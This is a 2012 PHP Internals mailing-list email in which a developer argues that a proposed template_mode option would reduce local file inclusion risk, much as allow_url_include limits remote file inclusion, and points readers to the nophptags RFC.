Hi, 2012/4/10 Luke Scott <l...@cywh.com>: > On Apr 9, 2012, at 10:03 PM, Yasuo Ohgaki <yohg...@ohgaki.net> wrote: > >> I strongly discourage settingallow_url_include=on, too. > > Good. > >> Enabling it only when it is needed is okay. > > No it's not. There is no reason to do so other than backwards > compatibility for very old code. > >> I think you are concerned about security, > > Absolutely. > >> so you could agree to have >> option for disabling embedded mode by option, couldn't you? > > Sure it can be an option. But it can't be the default, at least right > away. It's unreasonable. I would prefer an environmental variable to > choose the mode though. I'm not opposed to a php.ini option, but some > people are > > (If by embedded mode you mean template mode, and non-embedded mode as > "pure code mode"). > > I still fail to see what this has to do with allow_url_include.
"allow_url_include" and "template_mode" is similar to me. allow_url_include: enable only when url include is needed. template_mode: enable only when template mode is needed. allow_url_include prevents RFI which may result in critical security incident. template_mode prevents LFI which may result in critical security incident. Note: template_mode=off is script only mode. On is current behavior. > >> Letting programmers decide what to do > > Not in all cases. > >> Programming languages should give freedom to write suicide code >> more or less. > > No, it shouldn't. > > All that you've said comes down to this: > > Don't write bad code. Configure your web server properly. Wouldn't it be the same for allow_url_include? One could argue the same way for it. > The RFC isn't meant to address these issues, and quite frankly it > isn't a core PHP issue. It's no different than any language with an > eval() statement. I suppose you have missed SQL injection and LFI vulnerability discussion. LFI's true risk is misunderstood by many people, just like session adoption risk. (which I'm willing to fix it also) Note that SQL injection and LFI are common vulnerability for PHP applications. Please read the RFC how SQL injection is related to LFI. https://wiki.php.net/rfc/nophptags template_mode is much like allow_url_include. If user follow guideline, it eliminates LFI risk, just like RFI. > > Keep in mind an RFC isn't gospel. And it's still being drafted. We > need to give Tom a chance to finish it. I'm the one listed it under discussion :) Regards, -- Yasuo Ohgaki yohg...@ohgaki.net -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
